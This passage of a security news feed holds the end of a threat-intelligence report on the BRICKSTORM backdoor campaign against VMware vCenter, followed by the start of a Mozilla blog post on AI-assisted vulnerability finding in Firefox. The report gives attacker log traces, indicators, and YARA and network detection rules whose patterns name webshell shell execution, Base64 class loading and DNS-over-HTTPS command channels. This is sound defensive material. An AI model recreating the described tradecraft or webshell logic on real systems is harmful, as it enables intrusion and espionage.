<p><span>On VMware vCenter servers, VPXD logs contain valuable information for VM management related tasks such as clone events, powering on and off a VM, and creating snapshots. The threat actor often used the </span><code>VSPHERE.LOCAL\Administrator</code><span> account when cloning VMs and targeted VMs that would contain credentials such as password vaults and domain controllers. The threat actor would delete the cloned VM shortly after cloning, and primarily operated between the hours of 01:00 and 10:00 UTC. Investigators should search vCenter VPXD logs for activity that matches the aforementioned criteria and confirm if the cloning activity was intended or not.</span></p>
<h4><span>Creation of Local vCenter and ESXi Accounts</span></h4>
<p><span>Mandiant identified evidence the threat actor created a new local account to install BRICKSTORM and then removed the account after they were done. The following logs show the threat actor using the local Administrator account to create a new local account and add it to the </span><code>BashShellAdministrators</code><span> group. The threat actor established an SSH connection from a compromised appliance to vCenter using the newly created account and installed the BRICKSTORM backdoor on vCenter. Shortly after, the threat actor deleted the account. Investigators should review audit logs in </span><code>/var/log/audit/sso-events/audit_events.log</code><span> for the creation and deletion of local accounts and validate their purpose. In one instance, the threat actor named the account with a similar naming convention as a local service account used for backups on vCenter.</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>2025-04-01T06:45:32 {"user":"Administrator@VSPHERE.LOCAL","client":"","timestamp":"04/01/2025 06:45:32 GMT","description":"Creating local person user '&lt;account_name&gt;' with details ('','','','','&lt;account_name&gt;@vsphere.local')","eventSeverity":"INFO","type":"com.vmware.sso.PrincipalManagement"}

2025-04-01T06:45:55 {"user":"Administrator@VSPHERE.LOCAL","client":"","timestamp":"04/01/2025 06:45:55 GMT","description":"Adding users '[{Name: &lt;account_name&gt;, Domain: vsphere.local}]' to local group 'Administrators'","eventSeverity":"INFO","type":"com.vmware.sso.PrincipalManagement"}

2025-04-01T06:46:23 {"user":"Administrator@VSPHERE.LOCAL","client":"","timestamp":"04/01/2025 06:46:23 GMT","description":"Updating local group 'SystemConfiguration.BashShellAdministrators' details ('Access bash shell and manage local users on nodes').","eventSeverity":"INFO","type":"com.vmware.sso.PrincipalManagement"}

2025-04-01T06:52:03 &lt;vcenter_hostname&gt; sshd[36952]: Postponed keyboard-interactive/pam for &lt;account_name&gt;@vsphere.local from &lt;compromised_system&gt;

2025-04-01T06:52:30 &lt;vcenter_hostname&gt; sudo: pam_unix(sudo:session): session opened for user root

2025-04-01T06:53:39 Creation of BRICKSTORM on vCenter

2025-04-01T06:56:18 &lt;vcenter_hostname&gt; sudo: pam_unix(sudo:session): session closed for user root

2025-04-01T06:56:25 &lt;vcenter_hostname&gt; sshd[36952]: pam_unix(sshd:session): session closed for user &lt;account_name&gt;@vsphere.local

2025-04-01T06:56:57 {"user":"Administrator@VSPHERE.LOCAL","client":"","timestamp":"04/01/2025 06:56:57 GMT","description":"Removing principals '[{Name: &lt;account_name&gt;, Domain: vsphere.local}]' from local group 'Administrators'","eventSeverity":"INFO","type":"com.vmware.sso.PrincipalManagement"}

2025-04-01T06:58:12 {"user":"Administrator@VSPHERE.LOCAL","client":"","timestamp":"04/01/2025 06:58:12 GMT","description":"Deleting principal '&lt;account_name&gt;'","eventSeverity":"INFO","type":"com.vmware.sso.PrincipalManagement"}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>SSH Enablement on ESXi and vCenter</span></h4>
<p><span>For ESXi servers, monitoring should be set up for SSH logins using local accounts. In most organizations it is relatively rare for legitimate direct access to the ESXi hosts over SSH. In many cases the SSH server is disabled by default. Write rules to alert on log events when SSH is enabled for a vSphere platform appliance.</span></p>
<h4><span>Rogue VMs</span></h4>
<p><span>Organizations should review VMWare audit events that track the creation and deletion of new VMs, particularly using non-standard ISO images and Operating Systems. Audit events may also record the threat actor downloading archived ISO images to the datastore volumes used by vSphere. </span></p>
<h3><span>Hardening Guidance</span></h3>
<p><span>It is crucial to maintain an up-to-date inventory of appliances and other devices in the network that do not support the standard security tool stack. Any device in that inventory, whether internal or internet-facing, should be configured to follow a principle of least access.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Internet access: Appliances should not have unrestricted access to the internet. Work with your vendors or monitor your firewall logs to lock down internet access to only those domains or IP addresses that the appliance requires to function properly.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Internal network access: Appliances exposed to the internet should not have unrestricted access to internal IP address space. The management interface of most appliances does not need to establish connections to internal IP addresses. Work with the vendor to understand specific needsLDAP queries to verify user attributes for VPN logins.</span></p>
</li>
</ul>
<p><span>Mandiant has </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-from-unc3944"><span>previously published guidance</span></a><span> to secure the vSphere platform from threat actors. We recommend you follow the guidance, especially the forwarding of logs to a central SIEM, enabling vSphere lockdown mode, enforcing MFA for web logins, and enforcing the </span><code>execInstalledOnly</code><span> policy.</span></p>
<p><span>Organizations should assess and improve the isolation of any credential vaulting systems. In many cases if a threat actor is able to gain access to the underlying Operating System, any protected secrets can be exposed. Servers hosting credential vaulting applications should be considered Tier 0 systems and have strict access controls applied to them. Mandiant recommends organizations work with their vendors to adopt secure software practices such as storing encryption keys in the Trusted Platform Module (TPM) of the server.</span></p>
<h3><span>Outlook and Implications </span></h3>
<p><span>Recent intrusion operations tied to BRICKSTORM likely represent an array of objectives ranging from geopolitical espionage, access operations, and intellectual property (IP) theft to enable exploit development. Based on evidence from recent investigations the targeting of the US legal space is primarily to gather information related to US national security and international trade. Additionally, GTIG assesses with high confidence that the objective of BRICKSTORM targeting SaaS providers is to gain access to downstream customer environments or the data SaaS providers host on their customers' behalf. The targeting of technology companies presents an opportunity to conduct theft of valuable IP to further the development of zero-day exploits. </span></p>
<h3><span>Acknowledgements </span></h3>
<p><span><span>This analysis would not have been possible without the assistance from across Google Threat Intelligence Group, Mandiant Consulting and FLARE. We would like to specifically thank Nick Simonian from GTIG Research and Discovery (RAD). We would also like to thank Ryan Tomcik from Mandiant Threat Defense (MTD) for contributing network detection content</span>. </span></p>
<h3><span>Indicators of Compromise</span></h3>
<p><span>The following indicators of compromise are available in a <a href="https://www.virustotal.com/gui/collection/cedb89304a0a11fc60ebe24cb7f3f42683d19132851e3e97199860359fe4d26c/summary" rel="noopener" target="_blank">Google Threat Intelligence (GTI) collection</a>. Note that Mandiant has not observed instances where the threat actor reused a malware sample and hunting for the exact indicators is unlikely to yield results.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>SHA-256 Hash</span></strong></p>
</td>
<td>
<p><strong><span>File Name</span></strong></p>
</td>
<td>
<p><strong><span>Description</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><code>90b760ed1d0dcb3ef0f2b6d6195c9d852bcb65eca293578982a8c4b64f51b035</code></p>
</td>
<td>
<p><span>pg_update</span></p>
</td>
<td>
<p><span>BRICKSTORM</span></p>
</td>
</tr>
<tr>
<td>
<p><code>2388ed7aee0b6b392778e8f9e98871c06499f476c9e7eae6ca0916f827fe65df</code></p>
</td>
<td>
<p><span>spclisten</span></p>
</td>
<td>
<p><span>BRICKSTORM</span></p>
</td>
</tr>
<tr>
<td>
<p><code>aa688682d44f0c6b0ed7f30b981a609100107f2d414a3a6e5808671b112d1878</code></p>
</td>
<td>
<p><span>vmp</span></p>
</td>
<td>
<p><span>BRICKSTORM</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><span>YARA Detections</span></h3>
<h4><span>G_APT_Backdoor_BRICKSTORM_3</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_Backdoor_BRICKSTORM_3 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
strings:
		$str1 = { 48 8B 05 ?? ?? ?? ?? 48 89 04 24 E8 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 04 24 [0-5] E8 ?? ?? ?? ?? EB ?? }
		$str2 = "regex" ascii wide nocase
		$str3 = "mime" ascii wide nocase
		$str4 = "decompress" ascii wide nocase
		$str5 = "MIMEHeader" ascii wide nocase
		$str6 = "ResolveReference" ascii wide nocase
		$str7 = "115792089210356248762697446949407573529996955224135760342422259061068512044369115792089210356248762697446949407573530086143415290314195533631308867097853951" ascii wide nocase
	condition:
		uint16(0) == 0x457F and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_Backdoor_BRICKSTORM_2</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_BRICKSTORM_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$obf_func = /[a-z]{20}\/[a-z]{20}\/[a-z]{20}\/[a-z]{20}.go/
		$decr1 = { 0F B6 4C 04 ?? 0F B6 54 04 ?? 31 D1 88 4C 04 ?? 48 FF C0 [0-4] 48 83 F8 ?? 7C }
		$decr2 = { 40 88 7C 34 34 48 FF C3 48 FF C6 48 39 D6 7D 18 0F B6 3B 48 39 CE 73 63 44 0F B6 04 30 44 31 C7 48 83 FE 04 72 DA }
		$decr3 = { 0F B6 54 0C ?? 0F B6 5C 0C ?? 31 DA 88 14 08 48 FF C1 48 83 F9 ?? 7C E8 }
		$str1 = "main.selfWatcher"
		$str2 = "main.copyFile"
		$str3 = "main.startNew"
		$str4 = "WRITE_LOG=true"
		$str5 = "WRITE_LOGWednesday"
		$str6 = "vami-httpdvideo/webm"
		$str7 = "/opt/vmware/sbin/"
		$str8 = "/home/vsphere-ui/"
		$str9 = "/opt/vmware/sbin/vami-http"
		$str10 = "main.getVFromEnv"
	condition:
		uint32(0) == 0x464c457f and ((any of ($decr*) and $obf_func) or (any of ($decr*) and any of ($str*)) or 5 of ($str*)) and filesize &lt; 10MB
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_APT_Backdoor_BRICKSTORM_1</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_Backdoor_BRICKSTORM_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$ = "WRITE_LOGWednesday"
		$ = "/home/vsphere-ui/"
		$ = "WRITE_LOG=true"
		$ = "dns rcode: %v"
		$ = "dns query not specified or too small"
		$ = "/dev/pts: bad file descriptor"
		$ = "/libs/doh.Query"
		$ = "/libs/doh.createDnsMessage"
		$ = "/libs/doh.unpackDnsMessage"
		$ = "/core/protocol/websocket.(*WebSocketNetConfig).Dial"
		$ = "/core/protocol/websocket.(*connection).Read"
		$ = "/core/protocol/websocket.(*connection).getReader"
		$ = "/core/protocol/websocket.(*connection).Write"
		$ = "/core/protocol/websocket.(*connection).Close"
		$ = "/core/protocol/websocket.(*connection).LocalAddr"
		$ = "/core/protocol/websocket.(*connection).RemoteAddr"
		$ = "/core/protocol/websocket.(*connection).SetDeadline"
		$ = "/core/protocol/websocket.(*connection).SetReadDeadline"
		$ = "/core/protocol/websocket.(*connection).SetWriteDeadline"
		$ = "/core/protocol.UnPackHeaderData"
		$ = "/core/protocol.NewWebSocketClient"
		$ = "/libs/func1.(*Client).BackgroundRun"
		$ = "/libs/func1.CreateClient"
		$ = "/libs/func1.NewService"
		$ = "/libs/func1.(*Service).Get"
		$ = "/libs/func1.(*Service).DoTask"
		$ = "/libs/func1.(*Service).Put"
		$ = "/core/extends/command.Command"
		$ = "/core/extends/command.CommandNoContext"
		$ = "/core/extends/command.ExecuteCmd"
		$ = "/core/extends/command.RunShell"
		$ = "/core/extends/socks.UnPackHeaderData"
		$ = "/core/extends/socks.handleRelay"
		$ = "/libs/fs.(*RemoteDriver).realPath"
		$ = "/libs/fs.(*RemoteDriver).ChangeDir"
		$ = "/libs/fs.(*RemoteDriver).Stat"
		$ = "/libs/fs.(*SimplePerm).GetMode"
		$ = "/libs/fs.(*SimplePerm).GetOwner"
		$ = "/libs/fs.(*SimplePerm).GetGroup"
		$ = "/libs/fs.(*RemoteDriver).ListDir"
		$ = "/libs/fs.(*RemoteDriver).DeleteDir"
		$ = "/libs/fs.(*RemoteDriver).DeleteFile"
		$ = "/libs/fs.(*RemoteDriver).Rename"
		$ = "/libs/fs.(*RemoteDriver).MakeDir"
		$ = "/libs/fs.(*RemoteDriver).GetFile"
		$ = "/libs/fs.(*RemoteDriver).PutFile"
		$ = "/libs/fs.(*RemoteDriver).UpFile"
		$ = "/libs/fs.(*RemoteDriver).MD5"
		$ = "/libs/doh/doh.go"
		$ = "/core/protocol/websocket/config.go"
		$ = "/core/extends/command/command.go"
		$ = "/libs/fs/driver_unix.go"
		$ = "/libs/fs/perm_linux.go"
	condition:
		uint32(0) == 0x464c457f and 8 of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_APT_Backdoor_BRICKSTORM_2</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_Backdoor_BRICKSTORM_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = { 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? C6 44 ?? ?? 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? 0F 11 84 ?? ?? ?? ?? ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 04 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 4C ?? ?? E8 ?? ?? ?? ?? 4? 83 7C ?? ?? 00 0F 84 ?? ?? ?? ?? 4? 8D 05 ?? ?? ?? ?? 4? 89 ?? ?? E8 ?? ?? ?? ?? 4? 8B 7C ?? ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 47 08 83 3D ?? ?? ?? ?? 00 75 ?? 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 07 4? 89 BC ?? ?? ?? ?? ?? 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 0F 57 C0 0F 11 84 ?? ?? ?? ?? ?? 4? 8B ?? ?? ?? ?? ?? ?? 4? 81 C4 ?? ?? ?? ?? C3 }
		$str2 = { 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? 8B 84 ?? ?? ?? ?? ?? 4? 89 04 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 4C ?? ?? E8 ?? ?? ?? ?? 4? 8B 44 ?? ?? 4? 85 C0 0F 84 ?? ?? ?? ?? 4? 8D 05 ?? ?? ?? ?? 4? 89 ?? ?? E8 ?? ?? ?? ?? 4? 8B 44 ?? ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 48 08 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 4? 8B 8C ?? ?? ?? ?? ?? 4? 89 08 84 00 4? 89 84 ?? ?? ?? ?? ?? 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 01 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 4? C7 84 ?? ?? ?? ?? ?? 00 00 00 00 90 E8 ?? ?? ?? ?? 4? 8B ?? ?4 D8 00 00 00 4? 81 C4 E0 00 00 00 C3 }
	condition:
		uint32be(0) == 0x7F454C46 and any of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_APT_BackdoorWebshell_SLAYSTYLE_1</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_BackdoorWebshell_SLAYSTYLE_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = /String \w{1,10}=request\.getParameter\(\"\w{1,15}\"\);/ ascii wide nocase
		$str2 = "=new String(java.util.Base64.getDecoder().decode(" ascii wide nocase
		$str21 = /String\[\]\s\w{1,10}=\{\"\/bin\/sh\",\"-c\",\w{1,10}\+\"\s2&gt;&amp;1\"\};/ ascii wide nocase
		$str3 = "= Runtime.getRuntime().exec(" ascii wide nocase
		$str4 = "java.io.InputStream" ascii wide nocase
		$str5 = "java.util.Base64.getEncoder().encodeToString(org.apache.commons.io.IOUtils.toByteArray(" ascii wide nocase
	condition:
		filesize &lt; 5MB and all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_APT_BackdoorWebshell_SLAYSTYLE_2</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_BackdoorWebshell_SLAYSTYLE_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "request.getParameter" nocase
		$str2 = "/bin/sh"
		$str3 = "java.io.InputStream" nocase
		$str4 = "Runtime.getRuntime().exec(" nocase
		$str5 = "2&gt;&amp;1"
	condition:
		(uint16(0) != 0x5A4D and uint32(0) != 0x464C457F) and filesize &lt; 7KB and all of them and @str4 &gt; @str2
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_Backdoor_BRICKSTEAL_1</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Backdoor_BRICKSTEAL_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "comvmware"
		$str2 = "abcdABCD1234!@#$"
		$str3 = "ads.png"
		$str4 = "User-Agent"
		$str5 = "com/vmware/"
	condition:
		all of them and filesize &lt; 10KB
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_Dropper_BRICKSTEAL_1</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Dropper_BRICKSTEAL_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = "Base64.getDecoder().decode"
		$str2 = "Thread.currentThread().getContextClassLoader()"
		$str3 = ".class.getDeclaredMethod"
		$str4 = "byte[].class"
		$str5 = "method.invoke"
		$str6 = "filterClass.newInstance()"
		$str7 = "/websso/SAML2/SSO/*"
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>G_Dropper_BRICKSTEAL_2</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Dropper_BRICKSTEAL_2 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$str1 = /\(Class&lt;\?&gt;\)\smethod\.invoke\(\w{1,20},\s\w{1,20},\s0,\s\w{1,20}\.length\);/i ascii wide
		$str2 = "(\"yv66vg" ascii wide
		$str3 = "request.getSession().getServletContext" ascii wide
		$str4 = ".getClass().getDeclaredField(" ascii wide
		$str5 = "new FilterDef();" ascii wide
		$str6 = "new FilterMap();" ascii wide
	condition:
		all of them
}</code></pre></div>
<div class="block-paragraph_advanced"><h3>Network Detections</h3>
<p><a href="https://cloud.google.com/chronicle/docs/detection/windows-threats-category"><span>Google SecOps</span></a><span> customers have access to these broad category rules and more under the Mandiant Front-Line Threats rule pack. The following are <a href="https://cloud.google.com/chronicle/docs/detection/yara-l-2-0-overview" rel="noopener nofollow noreferrer" target="_blank">YARA-L 2.0 rules</a> for use in Google Security Operations; however, their logic can be replicated into other formats for use in other security products.</span></p>
<h4><span>Multiple DNS-over-HTTPS Services Queried</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule hunting_t1071_001_multiple_dns_over_https_services_queried {
  meta:
    rule_name = "Multiple DNS-over-HTTPS Services Queried"
    severity = "Low"
    tactic = "TA0011" // Command and Control
    technique = "T1071.001" // Application Layer Protocol: Web Protocols
    reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
    description = "Detects on requests by a source IP address to DNS-over-HTTPS (DoH) resolver IP addresses associated with multiple services, such as Quad9, Google DNS, and CloudFlare DNS. DoH is a protocol that encrypts DNS queries and responses using the HTTPS protocol. Threat actors may use DoH to obfuscate domain names associated with their externally hosted infrastructure that would otherwise be visible in standard DNS queries."

  events:
    $e.metadata.event_type = "NETWORK_CONNECTION"
    $e.target.ip = /^(8\.8\.8\.8|8\.8\.4\.4|9\.9\.9\.9|9\.9\.9\.11|1\.1\.1\.1|1\.0\.0\.1|45\.90\.28\.160|45\.90\.30\.160|149\.112\.112\.112|149\.112\.112\.11)$/ nocase
    (
      $e.target.port = 443 or
      $e.target.url = /dns-query|:443\/$|\d\.\d\.\d\.\d\/$/ nocase
    )
    $source_entity = strings.coalesce($e.principal.asset_id,$e.principal.ip)

  match:
    $source_entity over 2h

  outcome:
    $risk_score = max(35)
    $unique_doh_ips_count = count_distinct($e.target.ip)

  condition:
    $e and $unique_doh_ips_count &gt;= 5

  options:
    allow_zero_values = true
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule hunting_t1071_001_unknown_endpoint_generating_doh_and_web_development_services_communication {
  meta:
    rule_name = "Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication"
    severity = "Medium"
    tactic = "TA0011" // Command and Control
    technique = "T1071.001" // Application Layer Protocol: Web Protocols
    reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
    description = "Detects on requests by an unknown source IP address to multiple DNS-over-HTTPS (DoH) resolver services and web application development services, such as Cloudflare Workers or Heroku hosted web applications. To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains."

  events:
    $c1.metadata.event_type = "NETWORK_CONNECTION"
    $c1.target.ip = /^(8\.8\.8\.8|8\.8\.4\.4|9\.9\.9\.9|9\.9\.9\.11|1\.1\.1\.1|1\.0\.0\.1|45\.90\.28\.160|45\.90\.30\.160|149\.112\.112\.112|149\.112\.112\.11)$/ nocase
    $c1.principal.hostname = ""
    $c1.principal.asset_id = ""
    (
      $c1.target.port = 443 or
      $c1.target.url = /dns-query|:443\/$|\d\.\d\.\d\.\d\/$/ nocase
    )
    $c2.metadata.event_type = "NETWORK_CONNECTION"
    $c2.target.hostname = /\.workers\.dev$|\.herokuapp\.com$/ nocase
    $c2.principal.hostname = ""
    $c2.principal.asset_id = ""
    $c2.target.port = 443
    $source_entity = $c1.principal.ip
    $source_entity = $c2.principal.ip

  match:
    $source_entity over 24h

  outcome:
    $risk_score = max(65)
    $unique_doh_ips_count = count_distinct($c1.target.ip)

  condition:
    $c1 and $c2 and $unique_doh_ips_count &gt;= 3

  options:
    allow_zero_values = true
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule hunting_t1071_001_unknown_endpoint_generating_google_doh_and_cloudflare_communication {
  meta:
    rule_name = "Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication"
    severity = "Medium"
    tactic = "TA0011" // Command and Control
    technique = "T1071.001" // Application Layer Protocol: Web Protocols
    reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
    description = "Detects on requests by an unknown source IP address to Google DNS-over-HTTPS (DoH) resolver service and a Cloudflare hosted IP address. To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains."

  events:
    $c1.metadata.event_type = "NETWORK_CONNECTION"
    $c1.target.ip = /^(8\.8\.8\.8|8\.8\.4\.4)$/ nocase
    $c1.principal.hostname = ""
    $c1.principal.asset_id = ""
    (
      $c1.target.port = 443 or
      $c1.target.url = /dns-query|:443\/$|\d\.\d\.\d\.\d\/$/ nocase
    )
    $c2.metadata.event_type = "NETWORK_CONNECTION"
    $c2.principal.hostname = ""
    $c2.principal.asset_id = ""
    $c2.target.ip_geo_artifact.network.carrier_name = /cloudflare/ nocase
    $c2.target.port = 443
    $source_entity = $c1.principal.ip
    $source_entity = $c2.principal.ip

  match:
    $source_entity over 1h

  outcome:
    $risk_score = max(65)
    $time_diff = math.abs(min($c1.metadata.event_timestamp.seconds) - min($c2.metadata.event_timestamp.seconds))

  condition:
    $c1 and $c2 and $time_diff &lt;= 2

  options:
    allow_zero_values = true
}</code></pre></div>
<div class="block-paragraph_advanced"><h4><span>Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule hunting_t1071_001_unknown_endpoint_generating_google_doh_and_amazon_communication {
  meta:
    rule_name = "Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication"
    severity = "Medium"
    tactic = "TA0011" // Command and Control
    technique = "T1071.001" // Application Layer Protocol: Web Protocols
    reference = "https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"
    description = "Detects on requests by an unknown source IP address to Google DNS-over-HTTPS (DoH) resolver service and an Amazon hosted IP address. To investigate this activity further, determine the source of the network activity and verify if the communication is consistent with the device's intended use and standard allow-list domains."

  events:
    $c1.metadata.event_type = "NETWORK_CONNECTION"
    $c1.target.ip = /^(8\.8\.8\.8|8\.8\.4\.4)$/ nocase
    $c1.principal.hostname = ""
    $c1.principal.asset_id = ""
    (
      $c1.target.port = 443 or
      $c1.target.url = /dns-query|:443\/$|\d\.\d\.\d\.\d\/$/ nocase
    )
    $c2.metadata.event_type = "NETWORK_CONNECTION"
    $c2.principal.hostname = ""
    $c2.principal.asset_id = ""
    $c2.target.ip_geo_artifact.network.carrier_name = /amazon/ nocase
    $c2.target.port = 443
    $source_entity = $c1.principal.ip
    $source_entity = $c2.principal.ip

  match:
    $source_entity over 24h

  outcome:
    $risk_score = max(65)
    $time_diff = math.abs(min($c1.metadata.event_timestamp.seconds) - min($c2.metadata.event_timestamp.seconds))

  condition:
    // As observed by Mandiant IR, the two connection events to DoH and Amazon occurred nearly simultaneously
    $c1 and $c2 and $time_diff &lt;= 2

  options:
    allow_zero_values = true
}</code></pre></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Mozilla Blog: The zero-days are numbered]]></title>
<description><![CDATA[Since February, the Firefox team has been working around the clock using frontier AI models to find and fix latent security vulnerabilities in the browser. We wrote previously about our collaboration with Anthropic to scan Firefox with Opus 4.6, which led to fixes for 22 security-sensitive bugs i...]]></description>
<link>https://tsecurity.de/de/3501646/tools/the-mozilla-blog-the-zero-days-are-numbered/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3501646/tools/the-mozilla-blog-the-zero-days-are-numbered/</guid>
<pubDate>Fri, 08 May 2026 23:24:43 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure class="wp-block-image size-large"><img alt="Multiple white cursor arrows scattered across a bright orange background." class="wp-image-85480" height="576" src="https://blog.mozilla.org/wp-content/blogs.dir/278/files/2026/04/Cursor_Orange_1920x1080-1024x576.jpeg" width="1024"></figure>



<p>Since February, the Firefox team has been working around the clock using frontier AI models to find and fix latent security vulnerabilities in the browser. We <a href="https://blog.mozilla.org/en/firefox/hardening-firefox-anthropic-red-team/">wrote previously</a> about our collaboration with Anthropic to scan Firefox with Opus 4.6, which led to fixes for 22 security-sensitive bugs in Firefox 148.</p>



<p>As part of our continued collaboration with Anthropic, we had the opportunity to apply an early version of Claude Mythos Preview to Firefox. This week’s release of Firefox 150 includes fixes for 271 vulnerabilities identified during this initial evaluation.</p>



<p>As these capabilities reach the hands of more defenders, many other teams are now experiencing the same vertigo we did when the findings first came into focus. For a hardened target, just one such bug would have been red-alert in 2025, and so many at once makes you stop to wonder whether it’s even possible to keep up.</p>



<p>Our experience is a hopeful one for teams who shake off the vertigo and get to work. You may need to reprioritize everything else to bring relentless and single-minded focus to the task, but there is light at the end of the tunnel. We are extremely proud of how our team rose to meet this challenge, and others will too. Our work isn’t finished, but we’ve turned the corner and can glimpse a future much better than just keeping up. <strong>Defenders finally have a chance to win, decisively.</strong></p>



<p>Until now, the industry has largely fought security to a draw. Vendors of critical internet-exposed software like Firefox take security extremely seriously and have teams of people who get out of bed every morning thinking about how to keep users safe. Nevertheless, we’ve all long quietly acknowledged that bringing exploits to zero was an unrealistic goal. Instead, we aimed to make them so expensive that only actors with functionally unlimited budgets can afford them, and that the cost of burning such an expensive asset disincentivizes those actors against casual use.</p>



<p>This is because security to date has been offensively-dominant: the attack surface isn’t infinite, but it’s large enough to be difficult to defend comprehensively with the tools we’ve had available. This gives attackers an asymmetric advantage, since they only need to find one chink in the armor.</p>



<p>We use <em>defense-in-depth</em> to apply multiple layers of overlapping defenses, but no layer is bulletproof. Firefox runs each website in a separate process sandbox, but attackers try to combine bugs in the rendering code with bugs in the sandbox to escape to a more privileged context. We’ve led the industry in building and adopting Rust, but we still can’t afford to stop everything to rewrite decades of C++ code, especially since Rust only mitigates certain (very common) classes of vulnerabilities.</p>



<p>We pair defense-in-depth engineering with an internal red team tasked with staying on the leading edge of automated analysis techniques. Until recently, these have largely been dynamic analysis techniques like fuzzing. Fuzzing is quite fruitful in practice, but some parts of the code are harder to fuzz than others, leading to uneven coverage.</p>



<p>Elite security researchers find bugs that fuzzers can’t largely by reasoning through the source code. This is effective, but time-consuming and bottlenecked on scarce human expertise. Computers were completely incapable of doing this a few months ago, and now they excel at it. We have many years of experience picking apart the work of the world’s best security researchers, and Mythos Preview is every bit as capable. So far we’ve found no category or complexity of vulnerability that humans can find that this model can’t.</p>



